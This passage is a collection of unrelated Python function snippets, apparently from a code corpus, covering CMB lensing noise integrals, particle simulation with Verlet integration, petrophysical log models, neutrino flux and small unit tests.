l2>min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n phi = self.phi(L, l1, theta)\n result = 0. #self.F_EB(l1, l2, phi)*self.CMB.ftotalTE(l1)*self.CMB.ftotalEB(l2)\n result += 0. #self.F_EB(l2, l1, -phi)*self.CMB.ftotalTB(l1)*self.CMB.ftotalEE(l2)\n result *= self.F_TE(l1, l2, phi)\n result *= l1**2\n result /= (2.*np.pi)**2\n result *= 2.\n return result\n \n # if first time, initialize integrator\n if not hasattr(self.N_TE_EB.__func__, \"integ\"):\n self.N_TE_EB.__func__.integ = vegas.Integrator([[np.log(self.CMB.lMin), np.log(min(self.CMB.lMaxT, self.CMB.lMaxP))], [0., np.pi]])\n self.N_TE_EB.integ(integrand, nitn=8, neval=1000)\n result = self.N_TE_EB.integ(integrand, nitn=1, neval=5000)\n return result.mean", "def intf_ENTPGRAM(E):\n # !! Need to check for some eids being TRIs. Filter that out.\n if ( not inc.entid_or_LST_of_entids(E.The,3) or \n not inc.point_formatted_LST(E.The,2) or\n not inc.point_formatted_LST(E.The,1) ):\n print(\"Input Error: pgram\")\n print(intf_ENTPGRAM.__doc__)\n return # Without doing much of anything.\n oB= [ xyz.val for xyz in E.The.StackPop().val ] # A list [3.5 -2 0].\n oA= [ xyz.val for xyz in E.The.StackPop().val ] # A list [3.5 -2 0].\n myeids= E.The.StackPop().val\n if type(myeids)==type(list()):\n #myeids= map(lambda x:x.val, myeids) # Should now be a list of ints.\n myeids= [x.val for x in myeids] # Should now be a list of ints.\n else:\n myeids= [ myeids ] # Also a (1 item) list of ints.\n neweidlist= []\n for myeid in myeids:\n if myeid in MMEL.El: # Check if eid exists.\n src_ent= MMEL.El[myeid]\n new_ent= src_ent.duplicate()\n new_ent.translate([ oB[0]-oA[0], oB[1]-oA[1], oB[2]-oA[2] ])\n As= mm.Entity.allplist.PLdict[ src_ent.epts[0] ]\n Ae= mm.Entity.allplist.PLdict[ src_ent.epts[1] ]\n Bs= mm.Entity.allplist.PLdict[ new_ent.epts[0] ]\n Be= mm.Entity.allplist.PLdict[ new_ent.epts[1] ]\n neweidlist.append(new_ent.eid)\n MMEL.add_ent(new_ent)\n line_entS= mm.Line_Entity( [As,Bs] )\n neweidlist.append(line_entS.eid)\n MMEL.add_ent(line_entS)\n line_entE= mm.Line_Entity( [Ae,Be] )\n neweidlist.append(line_entE.eid)\n MMEL.add_ent(line_entE)\n tri_entA= mm.Tri_Entity( [As, Ae, Bs] )\n neweidlist.append(tri_entA.eid)\n MMEL.add_ent(tri_entA)\n tri_entB= mm.Tri_Entity( [Bs, Be, Ae] )\n neweidlist.append(tri_entB.eid)\n MMEL.add_ent(tri_entB)\n else:\n print(\"WARNING: Entity ID# %d does not exist.\" % myeid)\n if neweidlist:\n neweids= objectifier.StackOB_LST( [objectifier.StackOB_VAL(x) for x in neweidlist] )\n E.The.StackPush(neweids)\n OUT.default(MMEL,E) # AUTODUMP ", "def test_nr_trinuc(self):\n preds = [\n MotifChange(\"A\", \"C\"),\n MotifChange(\"G\", \"A\"),\n MotifChange(\"CGA\", \"TGA\"),\n ]\n sm = substitution_model.TimeReversibleTrinucleotide(predicates=preds)\n got = sm.get_param_list()\n self.assertEqual(got, [\"A/C\", \"G/A\", \"CGA/TGA\"])\n self.assertEqual(len(sm.get_motifs()), 64)", "def test_compute_inventory():\n T = [1000]\n c_max = [1e20]\n time = 1e3\n inv, sig = divHretention.compute_inventory(T, c_max, time)\n assert len(inv) == len(sig)\n assert len(inv) == len(T)", "def Phi_nu_mu1(self, E_nu, N=1e24):\n #check this \n try:\n phi = [0.]*len(E_nu)\n\n Int = lambda x: self.crossSection(x) * self.protonFlux(x) * self.F_nu_mu_1(E_nu/x, x) / x\n\n for i, E_nu in enumerate(E_nu):\n logE_min = np.log10(E_nu)\n logE_max = 10\n\n Intervals = int(np.ceil(logE_max-logE_min))\n\n IntegrationBoundary = np.logspace(logE_min, logE_max, Intervals+1)\n #print IntegrationBoundary\n\n for j in range(Intervals):\n phi[i] += 1.6*N*quad(Int, IntegrationBoundary[j], IntegrationBoundary[j+1])[0]\n\n return np.array(phi)\n\n except TypeError as e:\n phi = 0.\n\n Int = lambda x: self.crossSection(x) * self.protonFlux(x) * self.F_nu_mu_1(E_nu/x, x) / x\n\n logE_min = np.log10(E_nu)\n logE_max = 10\n\n Intervals = int(np.ceil(logE_max-logE_min))\n IntegrationBoundary = np.logspace(logE_min, logE_max, Intervals+1)\n #print IntegrationBoundary\n for i in range(Intervals):\n phi += 1.6*N*quad(Int, IntegrationBoundary[i], IntegrationBoundary[i+1])[0]\n print (phi)\n\n return phi", "def KPMO(XVal,YVal_State_1,YVal_State_2,YVal_State_3,XVal_Mean_Trans_1,XVal_Mean_Trans_2,XVal_Sig_Trans_1,XVal_Sig_Trans_2,iOpt):\n#\t1. Computations:\n\tTiny=1E-20\n\tP_Trans_1 = fCPD(XVal,XVal_Mean_Trans_1, XVal_Sig_Trans_1) # Transition of kerogen from State #1 to State #2\n\tP_Trans_2 = fCPD(XVal,XVal_Mean_Trans_2, XVal_Sig_Trans_2) # Transition of kerogen from State #2 to State #3\n\tFunVal=0\n\tif(iOpt==0):\n\t\tP_State_1=(1-P_Trans_1)*(1-P_Trans_2)\n\t\tP_State_2=P_Trans_1*(1 - P_Trans_2)\n\t\tP_State_3=1-P_State_1-P_State_2\n\t\tFunVal=(YVal_State_1*P_State_1)+(YVal_State_2*P_State_2)+(YVal_State_3*P_State_3)\n\tif(iOpt==1):\n\t\tFunVal=YVal_State_1+P_Trans_1*YVal_State_2+P_Trans_2*YVal_State_3\n\tif(FunVal==0):\n\t\tFunVal=Tiny\n\treturn FunVal", "def solveverlet(self,T,dt):\r\n t = 0.\r\n self.dt = dt\r\n self.n = int(T/dt)\r\n L = self.param[2]\r\n N = self.particles.size\r\n\r\n self.U = np.zeros([self.n])\r\n\r\n progress = t/T*100\r\n\r\n #JV: Here we define the number of the GxG grid that we will need to calcule the entropy, change in order to change the precision of this grid\r\n self.G = 7\r\n\r\n #JV: We create a list that will be useful for the walls submenu, that will help us in the border conditions of the wall, see in vel_verlet()\r\n self.bouncing = np.zeros(self.particles.size)\r\n\r\n if(self.param[4] == \"Subsystems\"): #JV: If we are on \"Subsystems\", we will count different the types of particles\r\n self.grid = np.zeros([self.G,self.G,2])\r\n else:\r\n self.grid = np.zeros([self.G,self.G,2]) #JV: When we are not in \"Subsystems\", we will have the same type of variable, but will only use the [:,:,0] (this is because numba has problems otherwise)\r\n\r\n self.entropy_val = 0\r\n\r\n #JV: If we are simulating the brownian simulation, we initialize the array that will keep track if the brownian particle goes through a wall\r\n if(self.param[4] == \"Brownian\"):\r\n self.wallcount = np.zeros([2])\r\n else:\r\n self.wallcount = np.zeros([2]) #JV: We have to keep both in the same type of variables, otherwise numba will have problems. So now this conditional block is quite poinless. TO-ERASE\r\n\r\n np.vectorize(lambda i: i.reset())(self.particles) #This line resets the particles to their initial position\r\n\r\n self.vel_verlet_on = True #JV: If it's true, it will compute with the velocity verlet algorithm, if it's not, it will compute with normal verlet\r\n\r\n self.Nlist = int(1*(self.particles.size)**(1/2)) #JV:This variable defines the number of close particles that will be stored in the list (go to close_particles_list() for more info)\r\n #print(self.Nlist)\r\n\r\n #X,Y,VX,VY has the trajectories of the particles with two indexes that\r\n #access time and particles, respectively\r\n self.X = np.vectorize(lambda i: i.r[0])(self.particles)\r\n self.Y = np.vectorize(lambda i: i.r[1])(self.particles)\r\n self.VX = np.vectorize(lambda i: i.v[0])(self.particles)\r\n self.VY = np.vectorize(lambda i: i.v[1])(self.particles)\r\n\r\n MX, MXT = np.meshgrid(self.X[:],self.X[:])\r\n MY, MYT = np.meshgrid(self.Y[:],self.Y[:])\r\n\r\n #JV: So dx is a nxn simetric array with 0 in the diagonal, and each position is the corresponding distance between the particles,\r\n # so the position [1,2] is the distance between partcle 1 and 2 (x1-x2), and so on\r\n dx = MXT - MX\r\n dx = dx\r\n\r\n dy = MYT - MY\r\n dy = dy\r\n\r\n r2 = np.square(dx)+np.square(dy)\r\n\r\n self.close_list = close_particles_list(r2,self.Nlist,self.particles.size,self.param[2]) #JV: we first calculate the matrix that contains in every row the indexs of the m closest particles\r\n\r\n if(self.vel_verlet_on == True):\r\n #JV: We define the variables that we will need in the velocity verlet algorithm\r\n print(\"Computing with the Velocity-Verlet algorithm\")\r\n X0 = self.X\r\n Y0 = self.Y\r\n VX0 = self.VX\r\n VY0 = self.VY\r\n\r\n X1 = self.X\r\n Y1 = self.Y\r\n VX1 = self.VX\r\n VY1 = self.VY\r\n\r\n MX, MXT = np.meshgrid(X0[:],X0[:],copy=False)\r\n MY, MYT = np.meshgrid(Y0[:],Y0[:],copy=False)\r\n dx = MXT - MX\r\n dx = dx\r\n\r\n dy = MYT - MY\r\n dy = dy\r\n\r\n r2 = np.square(dx)+np.square(dy)\r\n\r\n if(np.round((t/self.dt*dt)%0.5,1) == 0): #JV: every certain amount of steps we update the list\r\n self.close_list = close_particles_list(r2,self.Nlist,self.particles.size,self.param[2]) #JV: matrix that contains in every row the indexs of the m closest particles\r\n\r\n a0 = (1/self.m)*np.transpose(fv(X0[:],Y0[:],dx,dy,r2,t/self.dt,False,self.param[2],self.particles.size,self.U,self.dt,self.close_list,self.Nlist,self.vel_verlet_on,self.R,self.param[3],self.param[4],self.param[5],self.grid,self.G,self.wallcount,self.X2))\r\n\r\n for i in range(0, self.n):\r\n r1 = np.array([X0,Y0]) + np.array([VX0,VY0])*dt + 0.5*a0*dt**2\r\n\r\n MX, MXT = np.meshgrid(r1[0,:],r1[0,:],copy=False)\r\n MY, MYT = np.meshgrid(r1[1,:],r1[1,:],copy=False)\r\n dx = MXT - MX\r\n dx = dx\r\n\r\n dy = MYT - MY\r\n dy = dy\r\n\r\n r2 = np.square(dx)+np.square(dy)\r\n\r\n if(self.param[3] == \"Free!\"):\r\n #JV: We do this to get the actual distance in the case of the \"Free!\" simulation, in which there is no elastic collision between the particles and the boundaries\r\n dx_v2 = (np.abs(dx.copy())-1*L)\r\n r2_v2 = dx_v2**2+dy**2\r\n dx = np.where(r2 > r2_v2,dx_v2*np.sign(dx),dx)\r\n r2 = np.where(r2 > r2_v2,r2_v2,r2)\r\n dy_v2 = (np.abs(dy.copy())-1*L)\r\n r2_v2 = dx**2+dy_v2**2\r\n dy = np.where(r2 > r2_v2,dy_v2*np.sign(dy),dy)\r\n r2 = np.where(r2 > r2_v2,r2_v2,r2)\r\n r2_v2 = dx_v2**2+dy_v2**2\r\n dx = np.where(r2 > r2_v2,dx_v2*np.sign(dx),dx)\r\n dy = np.where(r2 > r2_v2,dy_v2*np.sign(dy),dy)\r\n r2 = np.where(r2 > r2_v2,r2_v2,r2)\r\n\r\n #JV: call velocityverlet to compute the next position\r\n if(np.round((t/self.dt*dt)%0.5,1) == 0): #JV: every certain amount of steps we update the list\r\n self.close_list = close_particles_list(r2,self.Nlist,self.particles.size,self.param[2]) #JV: matrix that contains in every row the indexs of the m closest particles\r\n\r\n X1,Y1,VX1,VY1,a1 = vel_verlet(t,dt,np.array([X0,Y0]),np.array([VX0,VY0]),a0,dx,dy,r2,self.close_list,self.m,self.R,L,N,self.param[3],self.param[4],self.param[7],self.param[8],self.param[9],self.U,self.Nlist,self.vel_verlet_on,self.param[5],self.grid,self.G,self.wallcount,self.X2,self.bouncing)\r\n\r\n #JV: Now we check where this particle is in a RxR grid, that will help us to calcule the entropy. We do not do this for the Brownian mode because we don't compute the entropy in that case.\r\n if(self.param[4] != \"Brownian\"):\r\n for h in range(0, N):\r\n if(self.param[4] == \"Subsystems\"):\r\n if(h < self.param[5]**2): #JV: self.param[5] stores the number of n1xn1 type 1 particles\r\n self.grid[int((X1[h]+0.495*L) / (L/self.G)), int((Y1[h]+0.495*L) / (L/self.G)),0] += 1\r\n else:\r\n self.grid[int((X1[h]+0.495*L) / (L/self.G)), int((Y1[h]+0.495*L) / (L/self.G)),1] += 1\r\n else:\r\n self.grid[int((X1[h]+0.495*L) / (L/self.G)), int((Y1[h]+0.495*L) / (L/self.G))] += 1\r\n\r\n if(self.param[4] == \"Brownian\"):\r\n if(self.wallcount[0] == 0):\r\n self.X2 = np.append(self.X2,(abs(X1[N-1]))**2)\r\n else:\r\n self.X2 = np.append(self.X2,(L*self.wallcount[0]+(X1[N-1]))**2)\r\n self.entropy = np.append(self.entropy,self.entropy_val)\r\n\r\n t += dt\r\n\r\n self.X = np.vstack((self.X,X1))\r\n self.Y = np.vstack((self.Y,Y1))\r\n self.VX = np.vstack((self.VX, VX1))\r\n self.VY = np.vstack((self.VY, VY1))\r\n a0 = a1\r\n\r\n #Redefine and repeat\r\n X0,Y0 = X1,Y1\r\n VX0,VY0 = VX1,VY1\r\n\r\n #JV: Every amount of steps of time we calculate the entropy\r\n update_entropy = 2\r\n if(i % update_entropy == 0):\r\n\r\n self.entropy_val = 0\r\n sumagrid = np.sum(self.grid)\r\n\r\n if(self.param[4] == \"Subsystems\"):\r\n sumagrid_subs = np.zeros([2])\r\n sumagrid_subs[0] = np.sum(self.grid[:,:,0]) #JV: Number of type-0 particles\r\n sumagrid_subs[1] = sumagrid - sumagrid_subs[0] #JV: Number of type-1 particles\r\n\r\n for j in range(self.G):\r\n for k in range(self.G):\r\n for l in range(2):\r\n if ((self.grid[j,k,0]+self.grid[j,k,1]) != 0):\r\n # pji = float(self.grid[j,k,l])/(update_entropy*(self.grid[j,k,0]+self.grid[j,k,1]))\r\n pji = float((self.grid[j,k,l]/(sumagrid_subs[l]/(sumagrid_subs[0]+sumagrid_subs[1])))/(update_entropy*(self.grid[j,k,0]/(sumagrid_subs[0]/(sumagrid_subs[0]+sumagrid_subs[1])))+(self.grid[j,k,1]/(sumagrid_subs[1]/(sumagrid_subs[0]+sumagrid_subs[1])))))\r\n else:\r\n pji = 0\r\n if(pji != 0):\r\n self.entropy_val += -pji*np.log(pji) #JV: We will only calculate the value when pji != 0\r\n\r\n self.entropy_val = self.entropy_val /(self.G**2)\r\n\r\n else:\r\n for j in range(self.G):\r\n for k in range(self.G):\r\n pji = float(self.grid[j,k,0])/(update_entropy*sumagrid)\r\n if(pji != 0):\r\n self.entropy_val += -pji*np.log(pji)\r\n\r\n self.entropy_val = self.entropy_val /(self.G**2)\r\n\r\n if(self.param[4] == \"Subsystems\"):\r\n self.grid = np.zeros([self.G,self.G,2])\r\n else:\r\n self.grid = np.zeros([self.G,self.G,2])\r\n\r\n #Update and show progress through console\r\n progress = t/T*100\r\n if(i%1000 == 0):\r\n print(int(progress),'% done')\r\n\r\n else:\r\n print(\"Computing with the Verlet algorithm\")\r\n\r\n #Generation of the precious position (backwards euler step)\r\n X1 = self.X\r\n Y1 = self.Y\r\n X0 = X1 - self.VX*dt\r\n Y0 = Y1 - self.VY*dt\r\n\r\n for self.i in range(0,self.n):\r\n #Call verlet to compute the next position\r\n X2,Y2 = self.verlet(t,dt,np.array([X0,Y0]),np.array([X1,Y1]))\r\n t = t + dt\r\n\r\n #Add the new positions to X,Y,VX,VY\r\n self.X = np.vstack((self.X,X2))\r\n self.Y = np.vstack((self.Y,Y2))\r\n self.VX = np.vstack((self.VX,(X2-X0)/(2*dt)))\r\n self.VY = np.vstack((self.VY,(Y2-Y0)/(2*dt)))\r\n\r\n #Redefine and repeat\r\n X0,Y0 = X1,Y1\r\n X1,Y1 = X2,Y2\r\n\r\n #Update and show progress through console\r\n progress = t/T*100\r\n if(self.i%1000 == 0):\r\n print(int(progress),'% done')\r\n\r\n #Once the computation has ended, I compute the kinetic energy,\r\n #the magnitude of the velocity V and the temperature\r\n #(see doc for temperature definition)\r\n self.KE()\r\n self.V = np.sqrt((self.VX**2 + self.VY**2))\r\n self.T = (np.sum(self.V**2,axis=1)/(self.particles.size*2 - 2))\r\n\r\n #Generation of the MB functions, you can modify the definition by\r\n #changing the linspace points\r\n vs,a = np.meshgrid(np.linspace(0,self.V.max(),100),self.T)\r\n a,ts = np.meshgrid(np.linspace(0,self.V.max(),100),self.T)\r\n self.MB = (vs/(ts)*np.exp(-vs**2/(2*ts)))\r\n\r\n #JV: If we are on the Subsystems submenu, we will calculate the temperature and the MB distribution of both types of particles\r\n if(self.param[4] == \"Subsystems\"):\r\n\r\n #JV: 1st group of particles\r\n self.V1 = np.sqrt((self.VX[:,0:(self.param[5]**2)]**2 + self.VY[:,0:(self.param[5]**2)]**2))\r\n self.T1 = (np.sum(self.V1**2,axis=1)/((self.param[5]**2)*2 - 2))\r\n\r\n vs1,a1 = np.meshgrid(np.linspace(0,self.V1.max(),100),self.T1)\r\n a1,ts1 = np.meshgrid(np.linspace(0,self.V1.max(),100),self.T1)\r\n self.MB1 = (vs1/(ts1)*np.exp(-vs1**2/(2*ts1)))\r\n\r\n #JV: 2nd group\r\n self.V2 = np.sqrt((self.VX[:,(self.param[5]**2):self.particles.size]**2 + self.VY[:,(self.param[5]**2):self.particles.size]**2))\r\n self.T2 = (np.sum(self.V2**2,axis=1)/((self.particles.size-self.param[5]**2)*2 - 2))\r\n\r\n vs2,a2 = np.meshgrid(np.linspace(0,self.V2.max(),100),self.T2)\r\n a2,ts2 = np.meshgrid(np.linspace(0,self.V2.max(),100),self.T2)\r\n self.MB2 = (vs2/(ts2)*np.exp(-vs2**2/(2*ts2)))\r\n\r\n \"\"\"Here I generate the accumulated V,T and MB using lists, the reason I use lists is because if you append two numpy arrays\r\n to an empty numpy array, they merge instead of remaining separate. You could technically use splicing to save on memory\r\n but sacrificing cpu.\"\"\"\r\n\r\n self.Vacu = []\r\n self.Tacu = []\r\n self.MBacu = []\r\n self.Vacu.append(self.V[int(self.n/2),:])\r\n self.Tacu.append(np.sum(self.V[int(self.n/2),:]**2)/(self.particles.size*2 - 2))\r\n\r\n vs = np.linspace(0,self.V.max(),100)\r\n self.MBacu.append((vs/(self.Tacu[0])*np.exp(-vs**2/(2*self.Tacu[0]))))\r\n\r\n #This delta controls the time interval for accumulation, right now its every 5 units\r\n delta = 5./dt\r\n\r\n #This 40 that appers in these lines is the time from which I start accumulating\r\n #to ensure the system has reached equilibrium.\r\n for i in range(1,int((self.n-(40./dt))/delta)):\r\n self.Vacu.append(np.hstack((self.Vacu[i-1],self.V[int(40./dt)+int(i*delta),:])))\r\n self.Tacu.append(np.sum(self.Vacu[i]**2)/(self.Vacu[i].size*2 - 2))\r\n self.MBacu.append((vs/(self.Tacu[i])*np.exp(-vs**2/(2*self.Tacu[i]))))\r\n return", "def N_TE_EE(self, L):\n if L>2.*min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n # integrand\n def integrand(x):\n theta = x[1]\n l1 = np.exp(x[0])\n l2 = self.l2(L, l1, theta)\n if l2<self.CMB.lMin or l2>min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n phi = self.phi(L, l1, theta)\n result = self.F_EE(l1, l2, phi)*self.CMB.ftotalTE(l1)*self.CMB.ftotalEE(l2)\n result += self.F_EE(l2, l1, -phi)*self.CMB.ftotalTE(l1)*self.CMB.ftotalEE(l2)\n result *= self.F_TE(l1, l2, phi)\n result *= l1**2\n result /= (2.*np.pi)**2\n result *= 2.\n return result\n \n # if first time, initialize integrator\n if not hasattr(self.N_TE_EE.__func__, \"integ\"):\n self.N_TE_EE.__func__.integ = vegas.Integrator([[np.log(self.CMB.lMin), np.log(min(self.CMB.lMaxT, self.CMB.lMaxP))], [0., np.pi]])\n self.N_TE_EE.integ(integrand, nitn=8, neval=1000)\n result = self.N_TE_EE.integ(integrand, nitn=1, neval=5000)\n return result.mean", "def eval(self, sample):\n '''\n jv = sample.get(JOINT_VELOCITIES)\n eepv = sample.get(END_EFFECTOR_POINT_VELOCITIES)\n\n boxpos = jv[:, 2:5]\n fingerpos = eepv[:, 7:10]\n tgtpos = np.zeros((100,3))\n for i in range(100):\n tgtpos[i] = [0.6, 0.2, 0.1]\n \n fetchdist = np.sum((boxpos - fingerpos) ** 2, axis=1)\n liftdist = np.sum((boxpos - tgtpos) ** 2, axis=1)\n \n l = fetchdist + liftdist\n '''\n\n eept = sample.get(END_EFFECTOR_POINTS)\n eepv = sample.get(END_EFFECTOR_POINT_VELOCITIES)\n sample_u = sample.get_U()\n cfrc_ext = np.concatenate((eept[:, 13:56], eepv[:, 0:41]), axis = 1)\n # vec = eepv[:, 64:66] \n # dist = np.sum(np.square(vec), axis=1) / 5\n forward_reward = eepv[:, 53]\n scaling = 150\n ctrl_cost = 0.5 * 1e-2 * np.sum(np.square(sample_u / scaling), axis = 1)\n # contact_cost = 0.5 * 1e-3 * np.sum(np.square(cfrc_ext), axis = 1)\n # survive_reward = 0.5\n \n l = -forward_reward + ctrl_cost\n\n prefix=''\n logger.record_tabular('PolReturn', -sum(l))\n\n ave_vel = np.mean(forward_reward)\n min_vel = np.min(forward_reward)\n max_vel = np.max(forward_reward)\n std_vel = np.std(forward_reward)\n logger.record_tabular(prefix+'PolAverageVelocity', ave_vel)\n logger.record_tabular(prefix+'PolMinVelocity', min_vel)\n logger.record_tabular(prefix+'PolMaxVelocity', max_vel)\n logger.record_tabular(prefix+'PolStdVelocity', std_vel)\n logger.dump_tabular(with_prefix=False)\n \n lx, lu, lxx, luu, lux = 0, 0, 0, 0, 0\n\n '''\n # Compute weighted sum of each cost value and derivatives.\n weight = self._weights[0]\n l = l * weight\n lx = lx * weight\n lu = lu * weight\n lxx = lxx * weight\n luu = luu * weight\n lux = lux * weight\n for i in range(1, len(self._costs)):\n pl, plx, plu, plxx, pluu, plux = self._costs[i].eval(sample)\n weight = self._weights[i]\n l = l + pl * weight\n lx = lx + plx * weight\n lu = lu + plu * weight\n lxx = lxx + plxx * weight\n luu = luu + pluu * weight\n lux = lux + plux * weight\n '''\n \n return l, lx, lu, lxx, luu, lux", "def test_get_nveto_pmt_item(self):\n pass", "def t(l3,Ei,Et,Et_axis):\n Ef=Ei-Et\n T=(-(l3/vFrmE(Ef))+(l3/np.sqrt(vFrmE(Ei)**2-vsq_from_E(Et_axis))))*1e6\n return (T)", "def ORM2(RHOB,PHIN,DTCO,RD,Dw,HIw,DTw,Rw,Df,HIf,DTf,Rf,Da,HIa,DTa,Ra,Dc1,HIc1,DTc1,PHIc1,Rc1,Dc2,HIc2,DTc2,PHIc2,Rc2,Dc3,HIc3,DTc3,PHIc3,Rc3,Ck,Dk,HIk,DTk,PHIk,Rk,RSK,Cwv,Ckv,Alpha,Sxoe):\n#\n# 5.1.1 Initialise Outputs & Check for missing values in inputs:\n# --------------------------------------------------------------\n\tPHIt=MissingValue\n\tPHIe=MissingValue\n\tCBW=MissingValue\n\tBVW=MissingValue\n\tHCPV=MissingValue\n\tVf=MissingValue\n\tVs=MissingValue\n\tSwt=MissingValue\n\tSwe=MissingValue\n\tVc1=MissingValue\n\tVc2=MissingValue\n\tVc3=MissingValue\n\tVk=MissingValue\n\tToc=MissingValue\n\tQc=MissingValue\n\tGDen=MissingValue\n\tif MissingValue in (RHOB,PHIN,DTCO,RD,Dw,HIw,DTw,Rw,Df,HIf,DTf,Rf,Da,HIa,DTa,Ra,Dc1,HIc1,DTc1,PHIc1,Rc1,Dc2,HIc2,DTc2,PHIc2,Rc2,Dc3,HIc3,DTc3,PHIc3,Rc3,Ck,Dk,HIk,DTk,PHIk,Rk,RSK,Cwv,Ckv,Alpha,Sxoe):\n\t\treturn PHIt,PHIe,CBW,BVW,HCPV,Vf,Vs,Swt,Swe,Vc1,Vc2,Vc3,Vk,Toc,Qc,GDen\n#\n# 5.1.2 Initialise parameters:\n# ----------------------------\n#\t5.1.2.1 Initialise Interation Control Paramaeters:\n#\t--------------------------------------------------\n\tNIter=0\n\tNIterMax=100\n\tErrIter=10000\n\tTolErrIter=0.0001\n\tIterEnd=0\n#\n#\t5.1.2.2 Initialise Volumes and Hydrocarbon Properties:\n#\t------------------------------------------------------\n\tVk=0.000 # Volume of kerogen initialised to zero\n\tVa=0.000 # Volume of adsorbed gas initialised to zero\n\tVf=0.000 # Volume of free gas initialised to zero\n#\n#\t5.7.3 Start interative loop:\n#\t-----------------------------\n\twhile IterEnd==0:\n#\n# 5.7.3.1 Compute Pore Fluid Properties:\n# --------------------------------------\n\t\tSum=Va+Vf\n\t\tif(Sum==0):\n\t\t\tDh=Df\n\t\t\tHIh=HIf\n\t\t\tDTh=DTf\n\t\telse:\n\t\t\tDh=(Va*Da+Vf*Df)/Sum\n\t\t\tHIh=(Va*HIa+Vf*HIf)/Sum\n\t\t\tDTh=(Va*DTa+Vf*DTf)/Sum\n\t\tDpf=(Sxoe*Dw)+(1-Sxoe)*Dh # Density of pore fluid\n\t\tHIpf=(Sxoe*HIw)+(1-Sxoe)*HIh # Hydrogen Index of pore fluid\n\t\tDTpf=(Sxoe*DTw)+(1-Sxoe)*DTh # DT of pore fluid\t\n#\n#\t5.7.3.2 Matrix Inversion:\n#\t-------------------------\n\t\tYMatrix = [RHOB,PHIN,1] # Populate YMatrix\n\t\tAMatrix = [[Dc1,Dk,Dpf],[HIc1,HIk,HIpf],[1,1,1]] # Populate AMatrix\n\t\tXMatrix,Qc=SolveAndCorrect(AMatrix,YMatrix) # Solve for XMatrix\n\t\tVc1=XMatrix[0] # Volume of component 1\n\t\tVc2=0.000 # Volume of component 2\n\t\tVc3=0.000 # Volume of component 3 (not calculated in this routine).\n\t\tVk=XMatrix[1] # Volume of organic component\n\t\tPHIe=XMatrix[2] # Volume of hydrocarbon in organic and inorganic pores\n#\n#\t5.7.3.3 Determine Total & Effective Water Saturations:\n#\t-----------------------------------------------------\n\t\tPHIm=(Vc1*PHIc1)+(Vc2*PHIc2)+(Vc3*PHIc3) # Compute Micro Porosity\n\t\tPHIt=PHIm+PHIe\n\t\tSwe=fConnectivityModel(RD,Vc1,Vc2,Vc3,Vk,PHIe,Rc1,Rc2,Rc3,Rk,Rw,Rf,Cwv,Ckv,Alpha)\n\t\tif(PHIt==0):\n\t\t\tSwt=1.000\n\t\telse:\n\t\t\tSwt=(PHIm+PHIe*Swe)/PHIt\n#\n#\t5.7.4.3 Compute Volume of Adsorbed and Free Gas:\n#\t------------------------------------------------\n\t\tVa=RSK*Vk # Volume of adsorbed gas in organic pores\n\t\tHCPV=PHIt*(1-Swt)\n\t\tif(Va>=HCPV):\n\t\t\tVa=HCPV\n\t\tVf=HCPV-Va # Volume of free gas\t\n#\n# 5.4.4 Test for interative computations:\n# ---------------------------------------\n\t\tNIter=NIter+1\n\t\tif(NIter>=NIterMax):\n\t\t\tIterEnd=1\n\t\telse:\t\t\t\n\t\t\tif(NIter<=2):\n\t\t\t\tResultOld=[1,1,1,1,1,1,1,1,1] # Initial Setting\n\t\t\t\tResultNew=[Vc1,Vc2,Vc3,Vk,Va,Vf,PHIe,Swt,Swe] # Current Results\n\t\t\t\tErrIter=ComputeMatrixDifference(ResultOld,ResultNew)\n\t\t\t\tResultOld=ResultNew\n\t\t\telse:\n\t\t\t\tResultNew=[Vc1,Vc2,Vc3,Vk,Va,Vf,PHIe,Swt,Swe] # Current Results\n\t\t\t\tErrIter=ComputeMatrixDifference(ResultOld,ResultNew)\n\t\t\t\tResultOld=ResultNew\n\t\t\t\tif(ErrIter<=TolErrIter):\n\t\t\t\t\tIterEnd=1\n#\n# 5.4.6 Preoutput computations:\n# ------------------------------\n\tCBW=PHIm # The assumption is that all microporosity can be considered to be clay bound water.\n\tBVW=PHIe*Swe # Bulk volume of water\n\tHCPV=PHIt*(1-Swt) # Hydrocarbon pore volume\t\n\tToc=fToc_Wtf(Vc1,Vc2,Vc3,Vk,0,Ck,Dc1,Dc2,Dc3,Dk,Dw) # TOC-wt fraction. Note: Vrw=0 in fToc_Wtf(Vc1,Vc2,Vc3,Vk,Vrw,Ck,Dc1,Dc2,Dc3,Dk,Dw) # Total Organic Carbon wt%\n\tGDen=fOrmGDen(Vc1,Vc2,Vc3,Vk,0,Dc1,Dc2,Dc3,Dk,Dw) # Grain Density. Note: Vrw=0 in fOrmGDen(Vc1,Vc2,Vc3,Vk,Vrw,Dc1,Dc2,Dc3,Dk,Dw) # Grain Density g/cm3\n#\n# 5.4.7 Output Results:\n# \t-------------------\n\treturn PHIt,PHIe,CBW,BVW,HCPV,Vf,Va,Swt,Swe,Vc1,Vc2,Vc3,Vk,Toc,Qc,GDen", "def _mn_par_ ( self , i ) :\n if not i in self : raise IndexError\n #\n val = ctypes.c_double ( 0 ) \n err = ctypes.c_double ( 0 ) \n #\n res = self.GetParameter ( i , val , err )\n #\n val = float ( val.value )\n err = float ( err.value )\n #\n return VE ( val , err*err )", "def ec_matrix_vector(p0, T, n): \n if(n<=0):\n EC=np.zeros(T.shape)\n return EC\n else:\n \"\"\"Probability vector after (k=0) propagations\"\"\" \n p_k=1.0*p0\n \"\"\"Sum of vectors after (k=0) propagations\"\"\"\n p_sum=1.0*p_k \n for k in xrange(n-1):\n \"\"\"Propagate one step p_{k} -> p_{k+1}\"\"\"\n p_k=np.dot(p_k,T) \n \"\"\"Update sum\"\"\"\n p_sum+=p_k \n \"\"\"Expected counts\"\"\"\n EC=p_sum[:,np.newaxis]*T \n return EC", "def marcovNuc (i = random.choice(stateSpace), step = 100):\n # matrix of transition probabilities\n #matrix = [[0.25, 0.25, 0.25, 0.25], [0.25, 0.25, 0.25, 0.25], [0.25, 0.25, 0.25, 0.25], [0.25, 0.25, 0.25, 0.25]] \n matrix = [[0.4, 0.3, 0.2, 0.1], [0.4, 0.3, 0.2, 0.1], [0.4, 0.3, 0.2, 0.1], [0.4, 0.3, 0.2, 0.1]] \n step += 1 # add one to the range because we remove it at the end\n sims = [] # List to hold the results of the Marcov chain\n sims.append(i) # append the seed value to the sims list\n for x in range(step):\n \n if sims[-1] == 'A':\n w = np.random.random() # Random number generator\n # the next set of if statements determine where the random number \n # sits on the number line of 